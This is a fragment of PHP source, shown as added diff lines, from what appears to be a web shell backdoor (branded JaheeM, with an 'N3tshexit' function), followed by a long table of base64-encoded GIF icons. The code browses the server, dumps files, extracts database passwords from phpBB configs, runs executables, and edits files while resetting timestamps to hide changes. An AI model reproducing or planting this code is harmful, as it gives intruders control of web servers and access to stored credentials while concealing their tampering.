    ";} + } + else + { + $r = @file_get_contents($d.$f); + $ext = explode(".",$f); + $c = count($ext)-1; + $ext = $ext[$c]; + $ext = strtolower($ext); + $rft = ""; + foreach($ftypes as $k=>$v) {if (in_array($ext,$v)) {$rft = $k; break;}} + if (eregi("sess_(.*)",$f)) {$rft = "phpsess";} + if (empty($ft)) {$ft = $rft;} + $arr = array( + array("","info"), + array("","html"), + array("","txt"), + array("Code","code"), + array("Session","phpsess"), + array("","exe"), + array("SDB","sdb"), + array("","img"), + array("","ini"), + array("","download"), + array("","notepad"), + array("","edit") + ); + echo "Viewing file:     ".$f." (".view_size(filesize($d.$f)).")      ".view_perms_color($d.$f)."
    Select action/file-type:
    "; + foreach($arr as $t) + { + if ($t[1] == $rft) {echo " ".$t[0]."";} + elseif ($t[1] == $ft) {echo " ".$t[0]."";} + else {echo " ".$t[0]."";} + echo " (+) |"; + } + echo "
    "; + if ($ft == "info") + { + echo "Information:"; + if (!$win) + { + echo "
    Path ".$d.$f."
    Size ".view_size(filesize($d.$f))."
    MD5 ".md5_file($d.$f)."
    Owner/Group "; + $ow = posix_getpwuid(fileowner($d.$f)); + $gr = posix_getgrgid(filegroup($d.$f)); + echo ($ow["name"]?$ow["name"]:fileowner($d.$f))."/".($gr["name"]?$gr["name"]:filegroup($d.$f)); + } + echo "
    Perms".view_perms_color($d.$f)."
    Create time ".date("d/m/Y H:i:s",filectime($d.$f))."
    Access time ".date("d/m/Y H:i:s",fileatime($d.$f))."
    MODIFY time ".date("d/m/Y H:i:s",filemtime($d.$f))."

    "; + $fi = fopen($d.$f,"rb"); + if ($fi) + { + if ($fullhexdump) {echo "FULL HEXDUMP"; $str = fread($fi,filesize($d.$f));} + else {echo "HEXDUMP PREVIEW"; $str = fread($fi,$hexdump_lines*$hexdump_rows);} + $n = 0; + $a0 = "00000000
    "; + $a1 = ""; + $a2 = ""; + for ($i=0; $i";} + $a1 .= "
    "; + $a2 .= "
    "; + } + } + //if ($a1 != "") {$a0 .= sprintf("%08X",$i)."
    ";} + echo "
    ".$a0."".$a1."".$a2."

    "; + } + $encoded = ""; + if ($base64 == 1) + { + echo "Base64 Encode
    "; + $encoded = base64_encode(file_get_contents($d.$f)); + } + elseif($base64 == 2) + { + echo "Base64 Encode + Chunk
    "; + $encoded = chunk_split(base64_encode(file_get_contents($d.$f))); + } + elseif($base64 == 3) + { + echo "Base64 Encode + Chunk + Quotes
    "; + $encoded = base64_encode(file_get_contents($d.$f)); + $encoded = substr(preg_replace("!.{1,76}!","'\\0'.\n",$encoded),0,-2); + } + elseif($base64 == 4) + { + $text = file_get_contents($d.$f); + $encoded = base64_decode($text); + echo "Base64 Decode"; + if (base64_encode($encoded) != $text) {echo " (failed)";} + echo "
    "; + } + if (!empty($encoded)) + { + echo "

    "; + } + echo "HEXDUMP: [Full] [Preview]
    Base64: +
    [Encode +[+chunk +[+chunk+quotes +[Decode +

    "; + } + elseif ($ft == "html") + { + if ($white) {@ob_clean();} + echo $r; + if ($white) {N3tshexit();} + } + elseif ($ft == "txt") {echo "

    ".htmlspecialchars($r)."
    ";} + elseif ($ft == "ini") {echo "
    "; var_dump(parse_ini_file($d.$f,TRUE)); echo "
    ";} + elseif ($ft == "phpsess") + { + echo "
    ";
    +   $v = explode("|",$r);
    +   echo $v[0]."
    "; + var_dump(unserialize($v[1])); + echo "
    "; + } + elseif ($ft == "exe") + { + $ext = explode(".",$f); + $c = count($ext)-1; + $ext = $ext[$c]; + $ext = strtolower($ext); + $rft = ""; + foreach($exeftypes as $k=>$v) + { + if (in_array($ext,$v)) {$rft = $k; break;} + } + $cmd = str_replace("%f%",$f,$rft); + echo "Execute file:

    Display in text-area
    "; + } + elseif ($ft == "sdb") {echo "
    "; var_dump(unserialize(base64_decode($r))); echo "
    ";} + elseif ($ft == "code") + { + if (ereg("php"."BB 2.(.*) auto-generated config file",$r)) + { + $arr = explode("\n",$r); + if (count($arr == 18)) + { + include($d.$f); + echo "phpBB configuration is detected in this file!
    "; + if ($dbms == "mysql4") {$dbms = "mysql";} + if ($dbms == "mysql") {echo "Connect to DB

    ";} + else {echo "But, you can't connect to forum sql-base, because db-software=\"".$dbms."\" is not supported by JaheeM. Please, report us for fix.";} + echo "Parameters for manual connect:
    "; + $cfgvars = array("dbms"=>$dbms,"dbhost"=>$dbhost,"dbname"=>$dbname,"dbuser"=>$dbuser,"dbpasswd"=>$dbpasswd); + foreach ($cfgvars as $k=>$v) {echo htmlspecialchars($k)."='".htmlspecialchars($v)."'
    ";} + echo "

    "; + } + } + echo "
    "; + if (!empty($white)) {@ob_clean();} + highlight_file($d.$f); + if (!empty($white)) {N3tshexit();} + echo "
    "; + } + elseif ($ft == "download") + { + @ob_clean(); + header("Content-type: application/octet-stream"); + header("Content-length: ".filesize($d.$f)); + header("Content-disposition: attachment; filename=\"".$f."\";"); + echo $r; + exit; + } + elseif ($ft == "notepad") + { + @ob_clean(); + header("Content-type: text/plain"); + header("Content-disposition: attachment; filename=\"".$f.".txt\";"); + echo($r); + exit; + } + elseif ($ft == "img") + { + $inf = getimagesize($d.$f); + if (!$white) + { + if (empty($imgsize)) {$imgsize = 20;} + $width = $inf[0]/100*$imgsize; + $height = $inf[1]/100*$imgsize; + echo "
    Size: "; + $sizes = array("100","50","20"); + foreach ($sizes as $v) + { + echo ""; + if ($imgsize != $v ) {echo $v;} + else {echo "".$v."";} + echo "   "; + } + echo "

    "; + } + else + { + @ob_clean(); + $ext = explode($f,"."); + $ext = $ext[count($ext)-1]; + header("Content-type: ".$inf["mime"]); + readfile($d.$f); + exit; + } + } + elseif ($ft == "edit") + { + if (!empty($submit)) + { + if ($filestealth) {$stat = stat($d.$f);} + $fp = fopen($d.$f,"w"); + if (!$fp) {echo "Can't write to file!";} + else + { + echo "Saved!"; + fwrite($fp,$edit_text); + fclose($fp); + if ($filestealth) {touch($d.$f,$stat[9],$stat[8]);} + $r = $edit_text; + } + } + $rows = count(explode("\r\n",$r)); + if ($rows < 10) {$rows = 10;} + if ($rows > 30) {$rows = 30;} + echo "
      
    "; + } + elseif (!empty($ft)) {echo "
    Manually selected type is incorrect. If you think, it is mistake, please send us url and dump of \$GLOBALS.
    ";} + else {echo "
    Unknown extension (".$ext."), please, select type manually.
    ";} + } +} +} +else +{ + @ob_clean(); + $images = array( +"arrow_ltr"=> +"R0lGODlhJgAWAIAAAAAAAP///yH5BAUUAAEALAAAAAAmABYAAAIvjI+py+0PF4i0gVvzuVxXDnoQ". +"SIrUZGZoerKf28KjPNPOaku5RfZ+uQsKh8RiogAAOw==", +"back"=> +"R0lGODlhFAAUAKIAAAAAAP///93d3cDAwIaGhgQEBP///wAAACH5BAEAAAYALAAAAAAUABQAAAM8". +"aLrc/jDKSWWpjVysSNiYJ4CUOBJoqjniILzwuzLtYN/3zBSErf6kBW+gKRiPRghPh+EFK0mOUEqt". +"Wg0JADs=", +"buffer"=> +"R0lGODlhFAAUAKIAAAAAAP////j4+N3d3czMzLKysoaGhv///yH5BAEAAAcALAAAAAAUABQAAANo". +"eLrcribG90y4F1Amu5+NhY2kxl2CMKwrQRSGuVjp4LmwDAWqiAGFXChg+xhnRB+ptLOhai1crEmD". +"Dlwv4cEC46mi2YgJQKaxsEGDFnnGwWDTEzj9jrPRdbhuG8Cr/2INZIOEhXsbDwkAOw==", +"change"=> +"R0lGODlhFAAUAMQfAL3hj7nX+pqo1ejy/f7YAcTb+8vh+6FtH56WZtvr/RAQEZecx9Ll/PX6/v3+". +"/3eHt6q88eHu/ZkfH3yVyIuQt+72/kOm99fo/P8AZm57rkGS4Hez6pil9oep3GZmZv///yH5BAEA". +"AB8ALAAAAAAUABQAAAWf4CeOZGme6NmtLOulX+c4TVNVQ7e9qFzfg4HFonkdJA5S54cbRAoFyEOC". +"wSiUtmYkkrgwOAeA5zrqaLldBiNMIJeD266XYTgQDm5Rx8mdG+oAbSYdaH4Ga3c8JBMJaXQGBQgA". +"CHkjE4aQkQ0AlSITan+ZAQqkiiQPj1AFAaMKEKYjD39QrKwKAa8nGQK8Agu/CxTCsCMexsfIxjDL". +"zMshADs=", +"delete"=> +"R0lGODlhFAAUAOZZAPz8/NPFyNgHLs0YOvPz8/b29sacpNXV1fX19cwXOfDw8Kenp/n5+etgeunp". +"6dcGLMMpRurq6pKSktvb2+/v7+1wh3R0dPnP17iAipxyel9fX7djcscSM93d3ZGRkeEsTevd4LCw". +"sGRkZGpOU+IfQ+EQNoh6fdIcPeHh4YWFhbJQYvLy8ui+xm5ubsxccOx8kcM4UtY9WeAdQYmJifWv". +"vHx8fMnJycM3Uf3v8rRue98ONbOzs9YFK5SUlKYoP+Tk5N0oSufn57ZGWsQrR9kIL5CQkOPj42Vl". +"ZeAPNudAX9sKMPv7+15QU5ubm39/f8e5u4xiatra2ubKz8PDw+pfee9/lMK0t81rfd8AKf///wAA". +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACH5". +"BAEAAFkALAAAAAAUABQAAAesgFmCg4SFhoeIhiUfIImIMlgQB46GLAlYQkaFVVhSAIZLT5cbEYI4". +"STo5MxOfhQwBA1gYChckQBk1OwiIALACLkgxJilTBI69RFhDFh4HDJRZVFgPPFBR0FkNWDdMHA8G". +"BZTaMCISVgMC4IkVWCcaPSi96OqGNFhKI04dgr0QWFcKDL3A4uOIjVZZABxQIWDBLkIEQrRoQsHQ". +"jwVFHBgiEGQFIgQasYkcSbJQIAA7", +"download"=> +"R0lGODlhFAAUALMIAAD/AACAAIAAAMDAwH9/f/8AAP///wAAAP///wAAAAAAAAAAAAAAAAAAAAAA". +"AAAAACH5BAEAAAgALAAAAAAUABQAAAROEMlJq704UyGOvkLhfVU4kpOJSpx5nF9YiCtLf0SuH7pu". +"EYOgcBgkwAiGpHKZzB2JxADASQFCidQJsMfdGqsDJnOQlXTP38przWbX3qgIADs=", +"forward"=> +"R0lGODlhFAAUAPIAAAAAAP///93d3cDAwIaGhgQEBP///wAAACH5BAEAAAYALAAAAAAUABQAAAM8". +"aLrc/jDK2Qp9xV5WiN5G50FZaRLD6IhE66Lpt3RDbd9CQFSE4P++QW7He7UKPh0IqVw2l0RQSEqt". +"WqsJADs=", +"home"=> +"R0lGODlhFAAUALMAAAAAAP///+rq6t3d3czMzLKysoaGhmZmZgQEBP///wAAAAAAAAAAAAAAAAAA". +"AAAAACH5BAEAAAkALAAAAAAUABQAAAR+MMk5TTWI6ipyMoO3cUWRgeJoCCaLoKO0mq0ZxjNSBDWS". +"krqAsLfJ7YQBl4tiRCYFSpPMdRRCoQOiL4i8CgZgk09WfWLBYZHB6UWjCequwEDHuOEVK3QtgN/j". +"VwMrBDZvgF+ChHaGeYiCBQYHCH8VBJaWdAeSl5YiW5+goBIRADs=", +"mode"=> +"R0lGODlhHQAUALMAAAAAAP///6CgpN3d3czMzIaGhmZmZl9fX////wAAAAAAAAAAAAAAAAAAAAAA". +"AAAAACH5BAEAAAgALAAAAAAdABQAAASBEMlJq70461m6/+AHZMUgnGiqniNWHHAsz3F7FUGu73xO". +"2BZcwGDoEXk/Uq4ICACeQ6fzmXTlns0ddle99b7cFvYpER55Z10Xy1lKt8wpoIsACrdaqBpYEYK/". +"dH1LRWiEe0pRTXBvVHwUd3o6eD6OHASXmJmamJUSY5+gnxujpBIRADs=", +"refresh"=> +"R0lGODlhEQAUALMAAAAAAP////Hx8erq6uPj493d3czMzLKysoaGhmZmZl9fXwQEBP///wAAAAAA". +"AAAAACH5BAEAAAwALAAAAAARABQAAAR1kMlJq0Q460xR+GAoIMvkheIYlMyJBkJ8lm6YxMKi6zWY". +"3AKCYbjo/Y4EQqFgKIYUh8EvuWQ6PwPFQJpULpunrXZLrYKx20G3oDA7093Esv19q5O/woFu9ZAJ". +"R3lufmWCVX13h3KHfWWMjGBDkpOUTTuXmJgRADs=", +"search"=> +"R0lGODlhFAAUALMAAAAAAP///+rq6t3d3czMzMDAwLKysoaGhnd3d2ZmZl9fX01NTSkpKQQEBP//". +"/wAAACH5BAEAAA4ALAAAAAAUABQAAASn0Ml5qj0z5xr6+JZGeUZpHIqRNOIRfIYiy+a6vcOpHOap". +"s5IKQccz8XgK4EGgQqWMvkrSscylhoaFVmuZLgUDAnZxEBMODSnrkhiSCZ4CGrUWMA+LLDxuSHsD". +"AkN4C3sfBX10VHaBJ4QfA4eIU4pijQcFmCVoNkFlggcMRScNSUCdJyhoDasNZ5MTDVsXBwlviRmr". +"Cbq7C6sIrqawrKwTv68iyA6rDhEAOw==", +"setup"=> +"R0lGODlhFAAUAMQAAAAAAP////j4+OPj493d3czMzMDAwLKyspaWloaGhnd3d2ZmZl9fX01NTUJC". +"QhwcHP///wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACH5BAEA". +"ABAALAAAAAAUABQAAAWVICSKikKWaDmuShCUbjzMwEoGhVvsfHEENRYOgegljkeg0PF4KBIFRMIB". +"qCaCJ4eIGQVoIVWsTfQoXMfoUfmMZrgZ2GNDPGII7gJDLYErwG1vgW8CCQtzgHiJAnaFhyt2dwQE". +"OwcMZoZ0kJKUlZeOdQKbPgedjZmhnAcJlqaIqUesmIikpEixnyJhulUMhg24aSO6YyEAOw==", +"small_dir"=> +"R0lGODlhEwAQALMAAAAAAP///5ycAM7OY///nP//zv/OnPf39////wAAAAAAAAAAAAAAAAAAAAAA". +"AAAAACH5BAEAAAgALAAAAAATABAAAARREMlJq7046yp6BxsiHEVBEAKYCUPrDp7HlXRdEoMqCebp". +"/4YchffzGQhH4YRYPB2DOlHPiKwqd1Pq8yrVVg3QYeH5RYK5rJfaFUUA3vB4fBIBADs=", +"small_unk"=> +"R0lGODlhEAAQAHcAACH5BAEAAJUALAAAAAAQABAAhwAAAIep3BE9mllic3B5iVpjdMvh/MLc+y1U". +"p9Pm/GVufc7j/MzV/9Xm/EOm99bn/Njp/a7Q+tTm/LHS+eXw/t3r/Nnp/djo/Nrq/fj7/9vq/Nfo". +"/Mbe+8rh/Mng+7jW+rvY+r7Z+7XR9dDk/NHk/NLl/LTU+rnX+8zi/LbV++fx/e72/vH3/vL4/u31". +"/e31/uDu/dzr/Orz/eHu/fX6/vH4/v////v+/3ez6vf7//T5/kGS4Pv9/7XV+rHT+r/b+rza+vP4". +"/uz0/urz/u71/uvz/dTn/M/k/N3s/dvr/cjg+8Pd+8Hc+sff+8Te+/D2/rXI8rHF8brM87fJ8nmP". +"wr3N86/D8KvB8F9neEFotEBntENptENptSxUpx1IoDlfrTRcrZeeyZacxpmhzIuRtpWZxIuOuKqz". +"9ZOWwX6Is3WIu5im07rJ9J2t2Zek0m57rpqo1nKCtUVrtYir3vf6/46v4Yuu4WZvfr7P6sPS6sDQ". +"66XB6cjZ8a/K79/s/dbn/ezz/czd9mN0jKTB6ai/76W97niXz2GCwV6AwUdstXyVyGSDwnmYz4io". +"24Oi1a3B45Sy4ae944Ccz4Sj1n2GlgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". +"AAjnACtVCkCw4JxJAQQqFBjAxo0MNGqsABQAh6CFA3nk0MHiRREVDhzsoLQwAJ0gT4ToecSHAYMz". +"aQgoDNCCSB4EAnImCiSBjUyGLobgXBTpkAA5I6pgmSkDz5cuMSz8yWlAyoCZFGb4SQKhASMBXJpM". +"uSrQEQwkGjYkQCTAy6AlUMhWklQBw4MEhgSA6XPgRxS5ii40KLFgi4BGTEKAsCKXihESCzrsgSQC". +"yIkUV+SqOYLCA4csAup86OGDkNw4BpQ4OaBFgB0TEyIUKqDwTRs4a9yMCSOmDBoyZu4sJKCgwIDj". +"yAsokBkQADs=", +"multipage"=>"R0lGODlhCgAMAJEDAP/////3mQAAAAAAACH5BAEAAAMALAAAAAAKAAwAAAIj3IR". +"pJhCODnovidAovBdMzzkixlXdlI2oZpJWEsSywLzRUAAAOw==", +"sort_asc"=> +"R0lGODlhDgAJAKIAAAAAAP///9TQyICAgP///wAAAAAAAAAAACH5BAEAAAQALAAAAAAOAAkAAAMa". +"SLrcPcE9GKUaQlQ5sN5PloFLJ35OoK6q5SYAOw==", +"sort_desc"=> +"R0lGODlhDgAJAKIAAAAAAP///9TQyICAgP///wAAAAAAAAAAACH5BAEAAAQALAAAAAAOAAkAAAMb". +"SLrcOjBCB4UVITgyLt5ch2mgSJZDBi7p6hIJADs=", +"sql_button_drop"=> +"R0lGODlhCQALAPcAAAAAAIAAAACAAICAAAAAgIAAgACAgICAgMDAwP8AAAD/AP//AAAA//8A/wD/". +"/////wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAMwAAZgAAmQAAzAAA/wAzAAAzMwAzZgAzmQAzzAAz/wBm". +"AABmMwBmZgBmmQBmzABm/wCZAACZMwCZZgCZmQCZzACZ/wDMAADMMwDMZgDMmQDMzADM/wD/AAD/". +"MwD/ZgD/mQD/zAD//zMAADMAMzMAZjMAmTMAzDMA/zMzADMzMzMzZjMzmTMzzDMz/zNmADNmMzNm". +"ZjNmmTNmzDNm/zOZADOZMzOZZjOZmTOZzDOZ/zPMADPMMzPMZjPMmTPMzDPM/zP/ADP/MzP/ZjP/". +"mTP/zDP//2YAAGYAM2YAZmYAmWYAzGYA/2YzAGYzM2YzZmYzmWYzzGYz/2ZmAGZmM2ZmZmZmmWZm". +"zGZm/2aZAGaZM2aZZmaZmWaZzGaZ/2bMAGbMM2bMZmbMmWbMzGbM/2b/AGb/M2b/Zmb/mWb/zGb/". +"/5kAAJkAM5kAZpkAmZkAzJkA/5kzAJkzM5kzZpkzmZkzzJkz/5lmAJlmM5lmZplmmZlmzJlm/5mZ". +"AJmZM5mZZpmZmZmZzJmZ/5nMAJnMM5nMZpnMmZnMzJnM/5n/AJn/M5n/Zpn/mZn/zJn//8wAAMwA". +"M8wAZswAmcwAzMwA/8wzAMwzM8wzZswzmcwzzMwz/8xmAMxmM8xmZsxmmcxmzMxm/8yZAMyZM8yZ". +"ZsyZmcyZzMyZ/8zMAMzMM8zMZszMmczMzMzM/8z/AMz/M8z/Zsz/mcz/zMz///8AAP8AM/8AZv8A". +"mf8AzP8A//8zAP8zM/8zZv8zmf8zzP8z//9mAP9mM/9mZv9mmf9mzP9m//+ZAP+ZM/+ZZv+Zmf+Z". +"zP+Z///MAP/MM//MZv/Mmf/MzP/M////AP//M///Zv//mf//zP///yH5BAEAABAALAAAAAAJAAsA". +"AAg4AP8JREFQ4D+CCBOi4MawITeFCg/iQhEPxcSBlFCoQ5Fx4MSKv1BgRGGMo0iJFC2ehHjSoMt/". +"AQEAOw==", +"sql_button_empty"=> +"R0lGODlhCQAKAPcAAAAAAIAAAACAAICAAAAAgIAAgACAgICAgMDAwP8AAAD/AP//AAAA//8A/wD/". +"/////wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAMwAAZgAAmQAAzAAA/wAzAAAzMwAzZgAzmQAzzAAz/wBm". +"AABmMwBmZgBmmQBmzABm/wCZAACZMwCZZgCZmQCZzACZ/wDMAADMMwDMZgDMmQDMzADM/wD/AAD/". +"MwD/ZgD/mQD/zAD//zMAADMAMzMAZjMAmTMAzDMA/zMzADMzMzMzZjMzmTMzzDMz/zNmADNmMzNm". +"ZjNmmTNmzDNm/zOZADOZMzOZZjOZmTOZzDOZ/zPMADPMMzPMZjPMmTPMzDPM/zP/ADP/MzP/ZjP/". +"mTP/zDP//2YAAGYAM2YAZmYAmWYAzGYA/2YzAGYzM2YzZmYzmWYzzGYz/2ZmAGZmM2ZmZmZmmWZm". +"zGZm/2aZAGaZM2aZZmaZmWaZzGaZ/2bMAGbMM2bMZmbMmWbMzGbM/2b/AGb/M2b/Zmb/mWb/zGb/". +"/5kAAJkAM5kAZpkAmZkAzJkA/5kzAJkzM5kzZpkzmZkzzJkz/5lmAJlmM5lmZplmmZlmzJlm/5mZ". +"AJmZM5mZZpmZmZmZzJmZ/5nMAJnMM5nMZpnMmZnMzJnM/5n/AJn/M5n/Zpn/mZn/zJn//8wAAMwA". +"M8wAZswAmcwAzMwA/8wzAMwzM8wzZswzmcwzzMwz/8xmAMxmM8xmZsxmmcxmzMxm/8yZAMyZM8yZ". +"ZsyZmcyZzMyZ/8zMAMzMM8zMZszMmczMzMzM/8z/AMz/M8z/Zsz/mcz/zMz///8AAP8AM/8AZv8A". +"mf8AzP8A//8zAP8zM/8zZv8zmf8zzP8z//9mAP9mM/9mZv9mmf9mzP9m//+ZAP+ZM/+ZZv+Zmf+Z". +"zP+Z///MAP/MM//MZv/Mmf/MzP/M////AP//M///Zv//mf//zP///yH5BAEAABAALAAAAAAJAAoA". +"AAgjAP8JREFQ4D+CCBOiMMhQocKDEBcujEiRosSBFjFenOhwYUAAOw==", +"sql_button_insert"=> +"R0lGODlhDQAMAPcAAAAAAIAAAACAAICAAAAAgIAAgACAgICAgMDAwP8AAAD/AP//AAAA//8A/wD/". +"/////wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAMwAAZgAAmQAAzAAA/wAzAAAzMwAzZgAzmQAzzAAz/wBm". +"AABmMwBmZgBmmQBmzABm/wCZAACZMwCZZgCZmQCZzACZ/wDMAADMMwDMZgDMmQDMzADM/wD/AAD/". +"MwD/ZgD/mQD/zAD//zMAADMAMzMAZjMAmTMAzDMA/zMzADMzMzMzZjMzmTMzzDMz/zNmADNmMzNm". +"ZjNmmTNmzDNm/zOZADOZMzOZZjOZmTOZzDOZ/zPMADPMMzPMZjPMmTPMzDPM/zP/ADP/MzP/ZjP/". +"mTP/zDP//2YAAGYAM2YAZmYAmWYAzGYA/2YzAGYzM2YzZmYzmWYzzGYz/2ZmAGZmM2ZmZmZmmWZm". +"zGZm/2aZAGaZM2aZZmaZmWaZzGaZ/2bMAGbMM2bMZmbMmWbMzGbM/2b/AGb/M2b/Zmb/mWb/zGb/". +"/5kAAJkAM5kAZpkAmZkAzJkA/5kzAJkzM5kzZpkzmZkzzJkz/5lmAJlmM5lmZplmmZlmzJlm/5mZ". +"AJmZM5mZZpmZmZmZzJmZ/5nMAJnMM5nMZpnMmZnMzJnM/5n/AJn/M5n/Zpn/mZn/zJn//8wAAMwA". +"M8wAZswAmcwAzMwA/8wzAMwzM8wzZswzmcwzzMwz/8xmAMxmM8xmZsxmmcxmzMxm/8yZAMyZM8yZ". +"ZsyZmcyZzMyZ/8zMAMzMM8zMZszMmczMzMzM/8z/AMz/M8z/Zsz/mcz/zMz///8AAP8AM/8AZv8A". +"mf8AzP8A//8zAP8zM/8zZv8zmf8zzP8z//9mAP9mM/9mZv9mmf9mzP9m//+ZAP+ZM/+ZZv+Zmf+Z". +"zP+Z///MAP/MM//MZv/Mmf/MzP/M////AP//M///Zv//mf//zP///yH5BAEAABAALAAAAAANAAwA". +"AAgzAFEIHEiwoMGDCBH6W0gtoUB//1BENOiP2sKECzNeNIiqY0d/FBf+y0jR48eQGUc6JBgQADs=", +"up"=> +"R0lGODlhFAAUALMAAAAAAP////j4+OPj493d3czMzLKysoaGhk1NTf///wAAAAAAAAAAAAAAAAAA". +"AAAAACH5BAEAAAkALAAAAAAUABQAAAR0MMlJq734ns1PnkcgjgXwhcNQrIVhmFonzxwQjnie27jg". +"+4Qgy3XgBX4IoHDlMhRvggFiGiSwWs5XyDftWplEJ+9HQCyx2c1YEDRfwwfxtop4p53PwLKOjvvV". +"IXtdgwgdPGdYfng1IVeJaTIAkpOUlZYfHxEAOw==", +"write"=> +"R0lGODlhFAAUALMAAAAAAP///93d3czMzLKysoaGhmZmZl9fXwQEBP///wAAAAAAAAAAAAAAAAAA". +"AAAAACH5BAEAAAkALAAAAAAUABQAAAR0MMlJqyzFalqEQJuGEQSCnWg6FogpkHAMF4HAJsWh7/ze". +"EQYQLUAsGgM0Wwt3bCJfQSFx10yyBlJn8RfEMgM9X+3qHWq5iED5yCsMCl111knDpuXfYls+IK61". +"LXd+WWEHLUd/ToJFZQOOj5CRjiCBlZaXIBEAOw==", +"ext_asp"=> +"R0lGODdhEAAQALMAAAAAAIAAAACAAICAAAAAgIAAgACAgMDAwICAgP8AAAD/AP//AAAA//8A/wD/". +"/////ywAAAAAEAAQAAAESvDISasF2N6DMNAS8Bxfl1UiOZYe9aUwgpDTq6qP/IX0Oz7AXU/1eRgI". +"D6HPhzjSeLYdYabsDCWMZwhg3WWtKK4QrMHohCAS+hABADs=", +"ext_mp3"=> +"R0lGODlhEAAQACIAACH5BAEAAAYALAAAAAAQABAAggAAAP///4CAgMDAwICAAP//AAAAAAAAAANU". +"aGrS7iuKQGsYIqpp6QiZRDQWYAILQQSA2g2o4QoASHGwvBbAN3GX1qXA+r1aBQHRZHMEDSYCz3fc". +"IGtGT8wAUwltzwWNWRV3LDnxYM1ub6GneDwBADs=", +"ext_avi"=> +"R0lGODlhEAAQACIAACH5BAEAAAUALAAAAAAQABAAggAAAP///4CAgMDAwP8AAAAAAAAAAAAAAANM". +"WFrS7iuKQGsYIqpp6QiZ1FFACYijB4RMqjbY01DwWg44gAsrP5QFk24HuOhODJwSU/IhBYTcjxe4". +"PYXCyg+V2i44XeRmSfYqsGhAAgA7", +"ext_cgi"=> +"R0lGODlhEAAQAGYAACH5BAEAAEwALAAAAAAQABAAhgAAAJtqCHd3d7iNGa+HMu7er9GiC6+IOOu9". +"DkJAPqyFQql/N/Dlhsyyfe67Af/SFP/8kf/9lD9ETv/PCv/cQ//eNv/XIf/ZKP/RDv/bLf/cMah6". +"LPPYRvzgR+vgx7yVMv/lUv/mTv/fOf/MAv/mcf/NA//qif/MAP/TFf/xp7uZVf/WIP/OBqt/Hv/S". +"Ev/hP+7OOP/WHv/wbHNfP4VzV7uPFv/pV//rXf/ycf/zdv/0eUNJWENKWsykIk9RWMytP//4iEpQ". +"Xv/9qfbptP/uZ93GiNq6XWpRJ//iQv7wsquEQv/jRAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". +"AAAAAAAAAAAAAAAAAAAAAAeegEyCg0wBhIeHAYqIjAEwhoyEAQQXBJCRhQMuA5eSiooGIwafi4UM". +"BagNFBMcDR4FQwwBAgEGSBBEFSwxNhAyGg6WAkwCBAgvFiUiOBEgNUc7w4ICND8PKCFAOi0JPNKD". +"AkUnGTkRNwMS34MBJBgdRkJLCD7qggEPKxsJKiYTBweJkjhQkk7AhxQ9FqgLMGBGkG8KFCg8JKAi". +"RYtMAgEAOw==", +"ext_cmd"=> +"R0lGODlhEAAQACIAACH5BAEAAAcALAAAAAAQABAAggAAAP///4CAgMDAwAAAgICAAP//AAAAAANI". +"eLrcJzDKCYe9+AogBvlg+G2dSAQAipID5XJDIM+0zNJFkdL3DBg6HmxWMEAAhVlPBhgYdrYhDQCN". +"dmrYAMn1onq/YKpjvEgAADs=", +"ext_cpp"=> +"R0lGODlhEAAQACIAACH5BAEAAAUALAAAAAAQABAAgv///wAAAAAAgICAgMDAwAAAAAAAAAAAAANC". +"WLPc9XCASScZ8MlKicobBwRkEIkVYWqT4FICoJ5v7c6s3cqrArwinE/349FiNoFw44rtlqhOL4Ra". +"Eq7YrLDE7a4SADs=", +"ext_ini"=> +"R0lGODlhEAAQACIAACH5BAEAAAYALAAAAAAQABAAggAAAP///8DAwICAgICAAP//AAAAAAAAAANL". +"aArB3ioaNkK9MNbHs6lBKIoCoI1oUJ4N4DCqqYBpuM6hq8P3hwoEgU3mawELBEaPFiAUAMgYy3VM". +"SnEjgPVarHEHgrB43JvszsQEADs=", +"ext_diz"=> +"R0lGODlhEAAQAHcAACH5BAEAAJUALAAAAAAQABAAhwAAAP///15phcfb6NLs/7Pc/+P0/3J+l9bs". +"/52nuqjK5/n///j///7///r//0trlsPn/8nn/8nZ5trm79nu/8/q/9Xt/9zw/93w/+j1/9Hr/+Dv". +"/d7v/73H0MjU39zu/9br/8ne8tXn+K6/z8Xj/LjV7dDp/6K4y8bl/5O42Oz2/7HW9Ju92u/9/8T3". 